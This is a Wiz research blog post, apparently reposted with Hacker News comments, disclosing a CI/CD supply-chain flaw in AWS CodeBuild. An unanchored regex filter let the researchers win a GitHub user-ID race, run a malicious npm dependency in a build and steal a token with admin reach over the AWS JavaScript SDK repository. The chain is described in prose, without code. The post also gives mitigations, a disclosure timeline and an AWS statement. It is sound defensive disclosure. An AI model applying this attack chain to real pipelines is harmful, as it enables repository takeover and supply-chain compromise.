Supply Chain Vuln Compromised Core AWS GitHub Repos & Threatened the AWS Console

2026-01-1517:3016038www.wiz.io

Wiz Research discovered CodeBreach, a critical vulnerability that risked the AWS Console supply chain. Learn how to secure your AWS CodeBuild pipelines.

Wiz Research uncovered CodeBreach, a critical vulnerability that placed the AWS Console supply chain at risk. The issue allowed a complete takeover of key AWS GitHub repositories - most notably the AWS JavaScript SDK, a core library that powers the AWS Console. By exploiting CodeBreach, attackers could have injected malicious code to launch a platform-wide compromise, potentially affecting not just the countless applications depending on the SDK, but the Console itself, threatening every AWS account.

The vulnerability stemmed from a subtle flaw in how the repositories’ AWS CodeBuild CI pipelines handled build triggers. Just two missing characters in a Regex filter allowed unauthenticated attackers to infiltrate the build environment and leak privileged credentials. This post breaks down how we leveraged this subtle misconfiguration to achieve a full repository takeover, and provides key recommendations for CodeBuild users to harden their own projects against similar attacks.

Wiz responsibly disclosed all findings to AWS, who promptly remediated the issue. AWS also implemented global hardening measures within the CodeBuild service to prevent similar attacks. Most notably, the new Pull Request Comment Approval build gate offers organizations a simple and secure path to prevent untrusted builds. Read the AWS Advisory here.

This issue follows a familiar pattern seen in recent supply-chain attacks like the Nx S1ngularity incident, where subtle CI/CD misconfigurations lead to disproportionately impactful attacks. Just last July, a threat actor abused a similar CodeBuild issue to launch a supply chain attack against users of the Amazon Q VS Code extension. This growing trend underscores the urgent need for organizations to harden their CI/CD pipelines.

Required Actions and Mitigations

While no immediate action is required by downstream consumers of the affected AWS GitHub repositories, we strongly recommend all AWS CodeBuild users implement the following safeguards to protect their own projects against similar issues.

  • Prevent Untrusted Pull Requests from Triggering Privileged Builds:

  • Secure the CodeBuild-GitHub Connection

    • Generate a unique, fine-grained Personal Access Token (PAT) for each CodeBuild project.

    • Strictly limit the PAT's permissions to the minimum required, as listed here.

    • Consider using a dedicated unprivileged GitHub account for the CodeBuild integration.

Find Vulnerable CodeBuild Projects with Wiz

Wiz customers can find CodeBuild projects that trigger builds based on untrusted pull requests using this pre-built query in the Wiz Threat Intel Center.

Why We Audited CodeBuild

Our investigation into AWS CodeBuild was sparked by the attempted supply-chain attack on the Amazon Q VS Code extension. In that incident, an attacker exploited a misconfigured CodeBuild project to compromise the extension’s GitHub repository and inject malicious code into the main branch. This code was then included in a release which users downloaded. Although the attacker’s payload ultimately failed due to a typo, it did execute on end users’ machines - clearly demonstrating the risk of misconfigured CodeBuild pipelines.

CodeBuild is a managed CI service that’s commonly connected to GitHub repositories, triggering builds on events like new pull requests. To interact with GitHub, CodeBuild requires GitHub credentials, which are, by default, present in the memory of the build environment. This creates a critical risk: if an attacker can compromise a single build, they are just a memory dump away from stealing credentials that often possess powerful permissions over the source repository.

To Build or Not To Build: The Pull Request Problem 

The most common way to compromise a CI build is through a pull request. An attacker forks the target repository, adds malicious code, and then opens a PR against the original project. If CodeBuild is configured to spawn builds on PR events, it will trigger a build based on the attacker's branch. In the vast majority of build systems like make or yarn, controlling the source code of a build process is enough to run arbitrary code. This is the exact mechanism the attacker exploited to compromise the Amazon Q extension.

To prevent this attack scenario, CodeBuild offers webhook filters - a set of rules that an event must meet to trigger a build. Back in August, these filters were the primary defense against untrusted pull requests. Among the available options, the go-to solution was the ACTOR_ID filter: an allow-list of approved GitHub user IDs that ensures only trusted users can trigger a build.

This seemed like a robust defense, but maintaining a list of user IDs can be cumbersome. We wondered: were organizations actually using this filter correctly?

To find out, we decided to search for GitHub repositories connected to Public CodeBuild projects. When set to public, CodeBuild projects expose their settings via a publicly accessible dashboard and automatically link to it in the status of any commit that triggers a build. From the dashboard, anyone can view the project's build logs and configurations - including the exact webhook filters being used.

An Apparent Dead End

Our initial scan was promising. We quickly found seven AWS-owned repositories with public CodeBuild pages. Of those, four were active and configured to run builds on pull requests:

  • The AWS SDK for JavaScript (aws/aws-sdk-js-v3)

  • AWS Libcrypto (aws/aws-lc)

  • Amazon Corretto Crypto Provider (corretto/amazon-corretto-crypto-provider)

  • The Registry of Open Data on AWS (awslabs/open-data-registry)

At first glance, everything seemed secure. All four projects implemented an ACTOR_ID filter, locking down builds to a list of approved maintainers. It appeared to be a dead end.

But the filter's syntax, shown above, was unusual for a typical ID list. The user IDs weren’t separated by commas or spaces, but by a pipe | character. That small detail was the key: in regular expressions, the | character means "OR". Reviewing the documentation confirmed it: the filter wasn't a simple list, it was a regex pattern. And it had a fatal flaw.

Unanchored: How a Subtle Flaw Led to CI Compromise

The issue was simple but critical: the regex patterns weren’t anchored. Without the start ^ and end $ anchors to require an exact match, a regex engine doesn't look for a string that perfectly matches the pattern, but one that merely contains it. This meant that any GitHub user ID that is a superstring of an approved ID could bypass the filter.

This was a powerful primitive in theory, but its success depended on a practical question: is it possible to register a brand-new GitHub user ID that contained the ID of an existing user?

When IDs Align

The answer is yes, and it hinges on how GitHub assigns IDs. Every user is given a unique and sequential numeric ID. Early accounts from 2008 have 5-digit IDs, while accounts from recent years ballooned to 9-digit IDs. As this sequence of numbers grows, it's inevitable that shorter, older IDs appear as substrings within longer, newer ones.

Based on our tests, GitHub creates roughly 200,000 new IDs each day. At that rate, for any given 6-digit maintainer ID, a new, longer ID containing it would become available for registration approximately every five days

We dubbed this recurring window of opportunity an "eclipse" -- the moment a new, longer ID perfectly "shadowed" a trusted maintainer's ID.

All four AWS repositories had short maintainer IDs only 6 or 7 digits long, resulting in frequent eclipses that made them all valid targets. 

Catching an Eclipse: Winning the Race for a Target ID

Having confirmed that a new GitHub ID could contain a maintainer's ID, the challenge became operational: how could we claim a specific ID the instant it became available? This was practically a race condition against the entire world, with roughly two new GitHub users created every second. We needed a way to create a lot of GitHub users at once.

The standard user sign-up flow is protected by reCAPTCHA, making automated account creation impossible. We needed a different approach.

Attempt #1: Organizations for ID Sampling

Our first thought was to use the GitHub Enterprise API to create organizations, which share the same ID pool as users. While this could allow us to claim the target ID, GH organization accounts can't open pull requests, making them useless for the final exploit. It wasn't a total dead end though. We repurposed this API into an ID sampling tool: we could create an organization, check its ID to see how close we were to the target ID, and then immediately delete it.

The Breakthrough: The GitHub App Manifest Flow

The real breakthrough came from GitHub Apps. Creating an app generates a corresponding bot user (e.g. app-name[bot]) that can interact with pull requests. It’s also possible to automate app creation via the manifest flow. While it’s composed of a few steps, it can be made atomic: the app and its bot are only created when a final confirmation URL is visited. 

This allowed us to prepare hundreds of app creation requests in advance and then, at the precise moment, visit all their confirmation URLs simultaneously. 

With our strategy in place, it was time to execute. We routinely used the organization-creation API to sample the current GitHub ID, allowing us to accurately predict the moment of the eclipse. We also initiated the manifest flow for 200 new GitHub Apps, collecting their unique confirmation URLs. 

We waited until the live ID count was just ~100 IDs away from the target ID, and then visited all 200 URLs at once, triggering a flood of new bot user registrations. The target ID was 226755743, which contained a trusted maintainer ID for the aws/aws-sdk-js-v3 repository.

After the registrations completed, a quick check confirmed our success:

We’d captured a user ID that could bypass the ACTOR_ID filter, and the method was reliable enough to be successfully repeated for each of the four target repositories.

From Bypass to Admin: Executing the Takeover

With our bot user able to bypass the ACTOR_ID filter, we were ready to execute the proof-of-concept. We chose to target the aws/aws-sdk-js-v3 repository, preparing a pull request that fixes a legitimate issue. Buried within the PR was the real payload: a new NPM package dependency designed to execute in the build environment and extract the GitHub credentials.

We submitted the PR, and soon after received a notification: a build had been triggered. Moments later, we had successfully obtained the GitHub credentials of the aws-sdk-js-v3 CodeBuild project. 

(If you're up for a challenge, try to find the commit in the PR that triggered the build.)

Our payload retrieved the GH token by dumping the memory of a process within the build environment. A previous memory dump mitigation in CodeBuild, which AWS implemented in response to the Amazon Q incident, overlooked this particular process. Following our disclosure, CodeBuild now protects this process as well. While this is a welcomed improvement, it isn’t bulletproof. GitHub credentials still reside in the build’s memory, and attackers with Linux privilege escalation exploits can circumvent memory protections. That’s why the most robust mitigation is using build gates to prevent untrusted builds from running in the first place.

The Blast Radius 

The credentials we obtained were a GitHub Classic Personal Access Token (PAT) belonging to the aws-sdk-js-automation user. For an attacker, this was the perfect user to compromise, as it regularly interacts with the repository and releases new versions to GitHub:

We quickly confirmed that the aws-sdk-js-automation user had full admin privileges over the repository. Initially though, our access was scoped by the token's permissions: repo and admin:repo_hook. To escalate privileges, we abused the token’s repo scope, which can manage repository collaborators, and invited our own GitHub user to be a repository administrator.

As administrators, we could now push code directly to the main branch, approve any pull request, and exfiltrate repository secrets.

This level of control provided a clear path for supply chain attacks. The JavaScript SDK is released on a weekly basis to GitHub and then to NPM. Abusing this frequent release schedule, attackers could have injected malicious payloads right before a release was published, compromising it. Just a month prior, a threat actor using this exact method successfully infected downstream users of the Amazon Q VS Code extension. 

While the Amazon Q incident was serious, the potential impact here was exponentially greater.  Based on our analysis, a staggering 66% of cloud environments include the JavaScript SDK - meaning two out of every three environments host an instance with the SDK installed. It’s an exceptionally prominent software library, and among its users is perhaps the cloud’s most critical application: The AWS Console itself. Moreover, the Console bundles recent SDK versions; the image below shows a request from the console which includes user credentials and uses an SDK version released just 18 days prior:

Beyond the aws-sdk-js-v3 repository, the token we obtained had full admin privileges over several other repositories related to the JavaScript SDK. Among them were three private repositories, including what appeared to be AWS’s private mirrors of the JavaScript SDK. At this point though, given the demonstrated takeover and its potential impact, we halted further research and immediately reported the issues to AWS.

Crucially, this vulnerability extended beyond the SDK. While we only performed the CI takeover on the aws-sdk-js-v3 repository, the same ACTOR_ID filter bypass was present in at least three other AWS GitHub repositories. Threat actors could have exploited these to compromise the GH credentials for three additional GH accounts. Two were automation accounts like aws-sdk-js-automation, but one was a personal GitHub account of an AWS employee.

Conclusion

This vulnerability is a textbook example of why adversaries target CI/CD environments: a subtle, easily overlooked flaw that can be exploited for massive impact. We've seen this exact pattern in the recent Nx S1ngularity and Amazon Q supply-chain attacks. 

This trend is no accident. Attackers are increasingly drawn to CI/CD systems because they represent an ideal target:

  1. They’re complex, making them prone to subtle misconfigurations;

  2. They handle untrusted data, often testing code from external contributors;

  3. They’re highly privileged, requiring powerful credentials to access code, publish artifacts, and deploy to the cloud.

This combination of complexity, untrusted data, and privileged credentials creates a perfect storm for high-impact breaches that require no prior access.

The success of recent attacks serves as a critical wake-up call. Adversaries have already shifted their focus to CI/CD pipelines, and defenders are trailing behind. Addressing this threat requires a joint effort: organizations need to reduce pipeline privileges and implement stricter build gates, and CI/CD platforms should make these secure baselines straightforward to adopt. For security teams, the first step is to enforce a simple yet powerful principle: untrusted contributions should never trigger privileged pipelines. 

Statement from AWS

AWS investigated all reported concerns highlighted by Wiz’s research team in "Infiltrating the AWS Console Supply Chain: Hijacking Core AWS GitHub Repositories via CodeBuild." In response, AWS took a number of steps to mitigate all issues discovered by Wiz, as well as additional steps and mitigations to protect against similar possible future issues. The core issue of actor ID bypass due to unanchored regexes for the identified repos was mitigated within 48 hours of first disclosure. Additional mitigations were implemented, including further protections of all build processes that contain Github tokens or any other credentials in memory. In addition, AWS audited all other public build environments to ensure that no such issues exist across the AWS open source estate. Finally, AWS audited the logs of all public build repositories as well as associated CloudTrail logs and determined that no other actor had taken advantage of the unanchored regex issue demonstrated by the Wiz research team. AWS determined there was no impact of the identified issue on the confidentiality or integrity of any customer environment or any AWS service.

We would like to thank Wiz’s research team for their work in identifying this issue and their responsible collaboration with us to ensure that our customers remain protected and secure.

August 25th, 2025 – Wiz Research reports the actor ID bypass and repo takeover to AWS. 

August 25th, 2025 – AWS and Wiz meet to review the findings and discuss mitigations.

August 27th, 2025 – AWS anchors the vulnerable actor ID filters and revokes the personal access token of aws-sdk-js-automation.

September 2025 – AWS implements additional hardening to prevent non-privileged builds from accessing the project’s credentials via memory dumping.

January 15th, 2026 – Public disclosure.

Stay in touch!

Hi there! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), and Yuval Avrahami (@yuvalavra) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: research@wiz.io. 


Read the original article

Comments

  • By chuckadams 2026-01-1518:455 reply

    Breaking this down, several of AWS's core repos like the JS SDK use an allowlist of which contributor ids can run workflow actions in their PRs. The list was a regex, contained several short ids, and wasn't anchored with ^$, so if it allowed user 12345, then any userid containing 12345 could run their own actions on the PR, including one that exfiltrated access tokens. So they spammed GH with user creation requests, got an id that matched, and they were in like Flynn.

    Said tokens didn't have admin access, but had enough privileges to invite other users to become full admins. Not sure if they were rotated, but github tokens are usually long-lived, like up to a year. Hey, isn't AWS the one always lecturing us to use temporary credentials? To be fair, AWS did more than just fix the regex, they introduced an "approve workflow run" UI unto the PR process that I think GH is also using now (not sure about that).

    • By cyberax 2026-01-1520:192 reply

      > Said tokens didn't have admin access, but had enough privileges to invite other users to become full admins.

      Ah... Github permissions. What fun.

      Github actually has a way to federate with AWS for short-lived credentials, but then it screws everything up by completely half-assing the ghcr.io implementation. It's only available using the old deprecated classic access tokens.

      • By catlifeonmars 2026-01-161:50

        Right? How is it that you still need a PAT or a custom app installation to access a registry?

      • By fowl2 2026-01-1811:211 reply

        Yeah wow! Even most "trusted" contributors shouldn't have this level of access. Is there really no way of scoping tokens with more granularity?

        • By cyberax 2026-01-1919:12

          Nope. The best we could do was to create a separate service that creates Docker tokens (using "docker login") and exposes a secure API.

          Obviously, GitHub needs to just fix this nonsense. But I interviewed a couple of "senior" engineers from GitHub, and I have zero hope of that happening soon.

    • By bink 2026-01-1523:142 reply

      As a security dude I spend way too much of my time fixing missing anchors or unescaped wildcards in regex. The good news is that it's trivial to detect with static analysis tooling. The bad news is that broken regex is often used for security checks.

      • By SkiFire13 2026-01-166:252 reply

        Sometimes I wish regexes were full matches by default and required prefixing and postfixing with `.*` to get the current behaviour

        • By chuckadams 2026-01-1616:33

          Java's Pattern.match() method works that way. Python has two separate methods: re.match auto-anchors, re.search does not.

        • By ruined 2026-01-169:06

          a match isn't boolean, it's substring. the original (and more common) use-cases would become excessively verbose

    • By TacticalCoder 2026-01-1521:04

      > The list was a regex ...

      Regexpes for security allow lists: what could possibly every go wrong uh!?

    • By bflesch 2026-01-1520:251 reply

      At least the vuln was old enough so that they couldn't blame AI for it, otherwise the article would read different ;)

      • By chuckadams 2026-01-1523:182 reply

        Ironically (?) an AI code review would very likely have noticed the overly-permissive regex.

        • By SkiFire13 2026-01-166:28

          This doesn't really matter as long as they also find 10x more nits that create noise for the human reviewer.

        • By catlifeonmars 2026-01-161:481 reply

          This is a good point. On my GH I’ve disabled Copilot reviews because the vast majority of them are false positives, but I’m reconsidering that position as it might still be worth it to wade through the spurious reviews just to catch some real issues.

          • By maxbond 2026-01-1615:282 reply

            I filter for false positives with language like this:

                For each bug you find, write a failing test. Run the test to make sure it fails. If it passes, try 1-3 times to fix the test. If you can't get it to work, delete the test and move on to the next bug.
            
            It's not perfect, you still get some non-bugs where the test fails because it's premises are wrong. Eg, recently I tossed out some tests that were asserting they could index a list at `foo.len()` instead of `foo.len() - 1`. But I've found a bunch of bugs this way too.

            • By catlifeonmars 2026-01-1919:46

              I take it this wasn’t Lua then?

              > I tossed out some tests that were asserting they could index a list at `foo.len()` instead of `foo.len() - 1`.

            • By catlifeonmars 2026-01-1615:33

              Nice, I’ll give this a try

    • By whatever1 2026-01-1521:501 reply

      Another success story for Regexes! Let's keep using this cryptic mess!

      • By pxc 2026-01-1522:342 reply

        I met regexes when I was 13, I think. I spent a little time reading the Java API docs on the language's regex implementation and played with a couple of regex testing websites during an introductory programming class at that age. I've used them for the rest of my life without any difficulty. Strict (formal) regexes are extremely simple, and even when using crazy implementations that allow all kinds of backreferences and conditionals, 99.999% of regexes in the wild are extremely simple as well. And that's true in the example from TFA! There's nothing tricky or cryptic about this regex.

        That said, what this regex wanted to be was obviously just a list. AWS should offer simpler abstractions (like lists) where they make sense.

        • By catlifeonmars 2026-01-161:531 reply

          > That said, what this regex wanted to be was obviously just a list. AWS should offer simpler abstractions (like lists) where they make sense.

          Agree. I would understand if there was some obvious advantage here, but it doesn’t really seem like there is a dimension here where regex has an advantage over a list. It’s (1) harder to implement, (2) harder to review, (3) much harder to test comprehensively, (4) harder for users to use (correctly/safely).

          • By twoodfin 2026-01-1612:55

            Presumably the advantage was ease and speed of developing the filtering feature.

            Wrong tradeoff, to be sure.

        • By whatever1 2026-01-163:261 reply

          [flagged]

          • By acdha 2026-01-163:432 reply

            This is too hot a take. Regular expressions are used in some cases where they shouldn’t be, yes, but there’s also been a ton of code which used other string operations but had bugs due to the complexity or edge-cases which would have been easier to avoid with a regex. You should know both tools and when they’re appropriate.

            • By pxc 2026-01-1615:48

              From an educational perspective, regular expressions are also a great way to teach about state machines, computational complexity, formal languages, and grammars in a way that has direct applications to tools that are long-lived and ubiquitous in industry.

              It's also this context that reveals how much simpler strict regular expressions are than general purpose programming languages like Python or JavaScript. That simplicity is also part of what makes regexes so ubiquitous: due to its lower computational complexity, regex parsing is really fast and doesn't take much memory.

              When I say regexes are simple, I'm not really talking about compactness. I mean low complexity in a computational sense! As someone who rather likes regex, I think it would be totally fair for a team to rule out all uses of PCRE2 that go beyond the scope of regular languages. Those uses of regex may be compact, but they're no longer simple.

              I'm also someone who is sensitive to readability-centered critiques of terse languages. Awk, sed, and even Bash parameter expansion can efficiently do precise transformations, too. But sometimes they should be avoided in favor of solutions that are more verbose, more explicit, and involve less special syntax. (Note also that Bash, awk, and sed are also all much more complex than regex!)

            • By whatever1 2026-01-164:271 reply

              Regex is not used for parsing HTML or C++ code. So it is not good for complex tasks.

              What is the claim? That it is compact for simple cases. Well Brainfuck is a compact programming language but I don't see it in production. Why?

              Because the whole point of programming is that multiple eyeballs of different competence are looking at the same code. It has to be as legible as possible.

              • By acdha 2026-01-1612:36

                > Regex is not used for parsing HTML or C++ code. So it is not good for complex tasks.

                Again, this is too binary a way if thinking. There are string matching operations which are not parsing source code and regular expressions can be a concise choice there. I’ve had cases where someone wrote multiple pages of convoluted logic trying to validate things where the regular expression was not only much easier to read but also correct because while someone was writing the third else-if block they missed a detail.

  • By btown 2026-01-1523:023 reply

    > To escalate privileges, we abused the token’s repo scope, which can manage repository collaborators, and invited our own GitHub user to be a repository administrator.

    From everything I know about pentesting, they should have stopped before doing this, right? From https://hackerone.com/aws_vdp?type=team :

    > You may only interact with accounts you own or with explicit written permission from AWS or the account owner

    • By bink 2026-01-1523:13

      I think it comes down to what you do with the access. Since this is a public repo I don't think I'd be too upset at the addition of a new admin so long as they didn't do anything with that access. It's a good way to prove the impact. If it were a private repo I might feel differently.

    • By InitialBP 2026-01-1613:17

      This comes entirely down to the scope of the agreement for the assessment. Some teams are looking for you to identify and exploit vulns in order to demonstrate the potential impact that those vulnerabilities could have.

      This is oftentimes political. The CISO wants additional budget for secure coding training and to hire more security engineers, let the pentesting firm demonstrate a massive compromise and watch the dollars roll in.

      A lot of time, especially in smaller companies, it's the opposite. No one is responsible for security and customers demand some kind of audit. "Don't touch anything we don't authorize and don't do anything that might impact our systems without explicit permissions."

      Wiz is a very prominent cloud security company who probably has incredibly lucrative contracts with AWS already, and their specialty, as I understand it, is identifying full "kill chains" in cloud environments. From access issues all the way to compromise of sensitive assets.

    • By az226 2026-01-165:111 reply

      It’s possible that AWS is a Wiz customer, which would allow them to do more stuff.

      • By rand846633 2026-01-1610:24

        I’d guess that we would not have had the pleasure of reading this article if wiz was payed by AWS. There were multiple high impact bug in 2025 that we read about here, where security researchers had to turn down small six figure bounties to avoid NDAs…

  • By mikesurowiec 2026-01-1521:27

    I worked on docs at GitHub which are open source, synced to an internal repo, and deployed on internal infra. I recall jumping through many hoops to make it work safely. These were workflows that had secrets access for deployments, and I recall zipping files, doing some weird handoffs/file filtering between different workflows based on the triggers and permissions. Security folks were really quick to find any gaps =)

    Glad to see a few more security knobs on actions these days!

HackerNews